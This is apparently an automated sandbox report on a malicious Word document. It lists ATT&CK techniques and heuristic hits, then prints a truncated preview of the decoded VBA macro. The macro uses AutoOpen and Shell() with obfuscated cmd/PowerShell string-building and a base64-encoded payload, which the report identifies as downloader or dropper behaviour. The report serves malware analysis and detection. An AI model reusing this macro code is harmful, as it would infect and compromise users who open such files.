MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen function that calls Shell(). The Shell() function is used to execute a command string that appears to be constructing a command to download and execute a payload. The reconstructed command string is 'md DSiATmiSSHh COXCOLhtNQwLqEQwYn Pmqj QcJACzKDOcqO s & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c '. This indicates a downloader or droppper functionality.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11887 bytes |
SHA-256: 486e6cbe6f2bf23d9bddb2ded1ba04f7dfc406813a5a5e2158a1772cc580a231 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ucLncQKUY" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function FMmNtW() On Error Resume Next SjOVh = Hex(HQLfJ + Hex(ZzsswD) * 22012 + Round(uvMqwU)) kXBzjt = Cos(wWUtBN) zOjiT = CDate(zciJnM) IXTYYN = Cos(WsJha) lzVYC = Hex(wUuhj + Hex(dXsIo) * 83817 + Round(WEfaD)) VnwzGE = Cos(EOKwGK) kOUNp = CDate(LupWOD) XDzFY = Cos(bhOzW) FMmNtW = WnzQtcEjRi + Shell(faMaBJJjko + Chr(iVdGfrhQWA + vbKeyC + OmBLzt) + HjcVNTZJ + JLzDCqBTAP + EmJIoomFn + jWpQrziTL + lQTMpXdzOkW + ohlkiCjO + OPdijVXMK, 56800 - 56800) diIPNt = Hex(ikZHj + Hex(kQlaz) * 53832 + Round(ClaAPF)) niZWP = Cos(aMECfc) MZhwvP = CDate(nCqGQX) krHIzH = Cos(OvKDs) End Function Sub Autoopen() On Error Resume Next rYMiuV = Hex(XdDcEz + Hex(mlsTF) * 83607 + Round(pVwuf)) IwdXu = Cos(iwPqH) vYPHn = CDate(DAqhcC) wBZCCP = Cos(OzqYzj) FMmNtW BUUXvl = Hex(JTwhi + Hex(qfibW) * 52036 + Round(wCFuMa)) zvhrH = Cos(wCfVK) RkoidU = CDate(zzjVP) YAlwP = Cos(KURJNl) End Sub Attribute VB_Name = "abVozIQ" Function HjcVNTZJ() On Error Resume Next upAobt = Hex(CcUrU + Hex(HJnaw) * 7179 + Round(BtUSf)) KVqDh = Cos(zDafF) CniwLz = CDate(TGRrl) FcjvA = Cos(hJPiB) fKhwzQizd = "md DSiATmiSSHh" + " COXCO" + "LhtNQwLqEQwYn" + "Pmqj" YniUR = Hex(iizuQu + Hex(iVuLF) * 85264 + Round(EfbjPI)) KXQmE = Cos(jnLpzo) NDYLMo = CDate(SwnzJq) ItMCF = Cos(GTKjH) VAJYZkXwPzO = " QcJ" + "ACzKDOc" + "qO" + "s & %^c^o^" + "m^S^p^E^c^% " + " %^c^o^m^S^p^E^" + "c^% /V " + " " + "/c " + " " RUvKF = Hex(QHQAG + Hex(TaRHL) * 69144 + Round(dOFbt)) ntjits = Cos(DBXWXo) ltjHHm = CDate(iirzHa) iwLsB = Cos(RSkcW) NYHtZWM = " set " + "%COuwU" + "RmVT" + "adiNVu%=RzMfkl" + "lBjq" + "&&se" + "t " + "%wHXXwwmpjLk" RMSDv = Hex(XBhkfw + Hex(GDEPp) * 59621 + Round(RZZELd)) dQTIG = Cos(wVjPav) kZiuR = CDate(XuHMC) zjqsmO = Cos(ROtlOb) TTzOkRwM = "%=p&&set %" + "zfVQCi" + "cQiHbnsP%=" + "o^w&&set %NF" NVlTp = Hex(tPBsqf + Hex(wFbVDQ) * 24559 + Round(BHczB)) dBqnUS = Cos(ABJoXN) ihwBH = CDate(tLmXhw) PLOIV = Cos(GPOLEW) MJAjq = "szzzpXuJtQSYw%=" + "zCfR" + "odQkw&&set %Ri" + "tDTuB%=!" + "%wH" + "XXwwm" + "pjLk%!&&set %ci" + "jIQc" + "sRiEjdVci%" szESj = Hex(CKaTJb + Hex(YpSOSG) * 42720 + Round(ionAS)) HmTWtf = Cos(jvHUqB) EosEhf = CDate(Rzzsw) JOJQR = Cos(zuXGw) fwCRdDF = "=p" + "bkaAhoiTojWO" + "&&set %Fh" + "nZnnZcE" + "lIf%=e^" + "r&&set %KzalpDU" + "LUTzc" vvptK = Hex(bEazpv + Hex(SnTqpU) * 59109 + Round(flVmrD)) DAjhwo = Cos(jaXmGQ) ZJYNjw = CDate(dEimRU) KUHSq = Cos(BZSHzu) XnOcmFF = "n%=!" + "%zfVQCicQiHbn" + "sP%!&&set %Wd" + "TRpSir%" + "=s&&set %Cjp" + "IAVVFPij" + "AznT%=obZBYwC" + "jJ&&set %MbFUn" + "wp%=he&" HjcVNTZJ = fKhwzQizd + VAJYZkXwPzO + NYHtZWM + TTzOkRwM + MJAjq + fwCRdDF + XnOcmFF End Function Function JLzDCqBTAP() On Error Resume Next DtSCOO = Hex(FbwYK + Hex(Cawzv) * 58669 + Round(VZGQU)) RszrQ = Cos(mRXkl) YDRKjX = CDate(IlwadV) VaLdm = Cos(iwzJG) BpsbQCULiZM = "&set %kfjRhIsmw" + "KX%=ll&&!%R" + "itDTuB%!!%Kz" + "alpDULUTzcn%!!%" + "Fhn" fKYmip = Hex(RWbCK + Hex(ihLiUR) * 43749 + Round(DsLGt)) jzaFIE = Cos(sYjwSl) DqtXA = CDate(EUWUds) ObRMjl = Cos(bUwVuG) mkXuiDTzTc = "ZnnZcElIf%!!" + "%WdTRpSir" + "%!!%MbFUnw" + "p%!!%kf" + "jRhIsmwK" + "X%! -e IAAmA" + "CgAIAAkAHMASABl" + "AGwATABJ" + "AGQAWwAxAF0AKw" qJcfBj = Hex(SNzoF + Hex(tPbGc) * 30304 + Round(kQHWS)) tqjuXd = Cos(wNKtob) ivOSY = CDate(fzMsqt) kGZCFN = Cos(mOjTb) KCqkali = "AkAHMAaABF" + "AGwATA" + "BpAEQA" + "WwAxADMAX" + "QArAC" + "cAWAAnACkA" + "KABOAGUAdw" + "AtAE8AYgB" + "KAEUAQwB0ACAA" + "IABJA" LJfEh = Hex(ADqpC + Hex(wqBwiq) * 8038 + Round(wJpoIn)) GaQLur = Cos(QVRHL) sbuRX = CDate(HWUqj) PwMBUr = Cos(tpudad) LpDSwhYqL = "E8ALgBjAE8ATQ" + "BwAHIAZQB" + "TAFMAaQBvAG4A" + "LgBkAEUAR" + "gBMA" + "EEAVABFAHMAVABy" + "AGUAYQBtA" + "CgAIABb" + "AG" zlafi = Hex(iflXP + Hex(QvjFm) * 69596 + Round(SfuAO ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.